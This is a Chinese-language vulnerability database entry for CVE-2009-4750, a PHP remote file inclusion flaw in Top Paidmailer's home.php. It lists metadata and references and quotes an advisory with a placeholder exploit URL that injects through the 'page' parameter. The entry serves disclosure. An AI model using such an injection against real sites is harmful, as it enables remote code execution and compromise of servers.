Phppower Top Paidmailer 'home.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118100 漏洞类型 代码注入
发布时间 2009-07-13 更新时间 2009-07-13
CVE编号 CVE-2009-4750 CNNVD-ID CNNVD-201003-409
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/34793
https://www.securityfocus.com/bid/43626
https://cxsecurity.com/issue/WLB-2010030256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-409
|漏洞详情
TopPaidmailer的脚本home.php存在PHP远程文件包含漏洞。远程攻击者可以借助page参数的URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/43626/info

Top Paidmailer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/patch/home.php?page=[rfi]
|受影响的产品
Top Paidmailer Top Paidmailer 0
|参考资料

来源:XF
名称:toppaidmailer-home-file-include(51661)
链接:http://xforce.iss.net/xforce/xfdb/51661
来源:MISC
链接:http://www.packetstormsecurity.org/0907-exploits/toppaidmailer-rfi.txt
来源:OSVDB
名称:55797
链接:http://www.osvdb.org/55797
来源:SECUNIA
名称:35723
链接:http://secunia.com/advisories/35723